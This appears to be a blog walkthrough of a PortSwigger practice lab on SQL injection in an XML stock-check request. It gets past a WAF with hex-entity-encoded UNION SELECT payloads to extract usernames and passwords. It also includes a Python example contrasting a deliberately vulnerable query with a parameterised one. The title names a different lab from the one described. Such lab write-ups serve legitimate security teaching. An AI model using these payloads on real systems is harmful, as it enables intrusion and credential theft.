Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

Joel O.

Lab Scenario: Our objective is to understand and exploit a SQL injection vulnerability in the WHERE clause of a web application's stock check feature. By carefully probing and bypassing security measures, we aim to retrieve hidden data and ultimately solve the lab. Let's embark on this journey using Burp Suite:

  1. Identifying the Vulnerability:

    • Observe that the stock check feature sends the productId and storeId to the application in XML format.

    • Send the POST /product/stock request to Burp Repeater.

  2. Probing for Injection Points:

    • In Burp Repeater, probe the storeId to see whether your input is evaluated. Replace the ID with a mathematical expression and check whether the result is treated as a different store ID:

        <storeId>1+1</storeId>
    • Observe that your input appears to be evaluated, returning stock information for different stores.

  3. Bypassing the Web Application Firewall (WAF):

    • Attempt to determine the number of columns returned by the original query using a UNION SELECT statement. Note that this request is likely to be blocked:

        <storeId>1 UNION SELECT NULL</storeId>

    • Bypass the WAF by obfuscating your payload with XML entities. The Hackvertor extension for Burp Suite can encode the payload as entities for you.

    • Resend the request and confirm that you receive a normal response, indicating successful WAF bypass.

  4. Crafting the Exploit:

    • Deduce that the query returns a single column: attempting to return more than one column results in an error.

    • Concatenate the usernames and passwords into that single column using SQL injection, with the payload wrapped in Hackvertor's hex-entity tag:

        <storeId><@hex_entities>1 UNION SELECT username || '~' || password FROM users<@/hex_entities></storeId>
    • Observe that you've successfully fetched usernames and passwords from the database, separated by a ~ character.

  5. Solving the Lab:

    • Use the administrator's credentials obtained from the exploit to log in and solve the lab.
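The flaw the walkthrough exploits, and how it is closed, as an added Python example that is not part of the original post or of the lab: a stand-in stock check that parses the XML body, with the vulnerable string-concatenated WHERE clause beside a parameterised, allow-listed version. The table and column names and the request bodies are constructed for illustration.

```python
import re
import sqlite3
import xml.etree.ElementTree as ET

# Constructed in-memory stand-in for the lab's database (assumption: table and
# column names are made up; the real lab's schema is not shown on the page).
SCHEMA = """
CREATE TABLE stock (product_id INTEGER, store_id INTEGER, quantity INTEGER);
INSERT INTO stock VALUES (1, 1, 42), (1, 2, 7);
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO users VALUES ('administrator', 'example-secret');
"""

def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn

def parse_store_id(xml_body):
    # The XML parser expands character entities (e.g. &#x55; -> "U") before the
    # value reaches the SQL layer, so a WAF that pattern-matches the raw request
    # body never sees the decoded keyword. Inspection belongs after this step.
    root = ET.fromstring(xml_body)
    return root.findtext("storeId")

def stock_check_vulnerable(conn, xml_body):
    # Vulnerable: the decoded value is concatenated straight into the WHERE clause.
    store_id = parse_store_id(xml_body)
    sql = "SELECT quantity FROM stock WHERE product_id = 1 AND store_id = " + store_id
    return [row[0] for row in conn.execute(sql)]

def stock_check_hardened(conn, xml_body):
    # Hardened: allow-list the shape of the value, then bind it as a parameter so
    # it can never alter the query structure. None stands for an HTTP 400 reply.
    store_id = parse_store_id(xml_body)
    if store_id is None or not re.fullmatch(r"[0-9]+", store_id):
        return None
    sql = "SELECT quantity FROM stock WHERE product_id = 1 AND store_id = ?"
    return [row[0] for row in conn.execute(sql, (int(store_id),))]

# Constructed request bodies. ENTITY_BODY carries the page's UNION payload with
# the leading "U" hex-entity-encoded (Hackvertor encodes every character; one
# is enough to show that the decoded value is what reaches the query).
NORMAL_BODY = "<stockCheck><productId>1</productId><storeId>2</storeId></stockCheck>"
ENTITY_BODY = ("<stockCheck><productId>1</productId><storeId>1 &#x55;NION SELECT "
               "username || '~' || password FROM users</storeId></stockCheck>")

if __name__ == "__main__":
    db = open_db()
    print("vulnerable:", stock_check_vulnerable(db, ENTITY_BODY))
    print("hardened:", stock_check_hardened(db, ENTITY_BODY))
```

Running it shows the concatenated query returning the users table alongside the stock row, while the hardened handler rejects the same body before any query runs.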

Conclusion

This hands-on lab provides practical insights into exploiting SQL injection vulnerabilities in the WHERE clause, showcasing the potential risks associated with inadequate security measures. By following this step-by-step guide, users can enhance their skills in identifying, exploiting, and mitigating SQL injection flaws. Stay informed, keep learning, and continue exploring the dynamic field of cybersecurity to contribute to a more secure online environment.

Reference:

https://portswigger.net/web-security/sql-injection

https://portswigger.net/web-security/sql-injection/lab-sql-injection-with-filter-bypass-via-xml-encoding
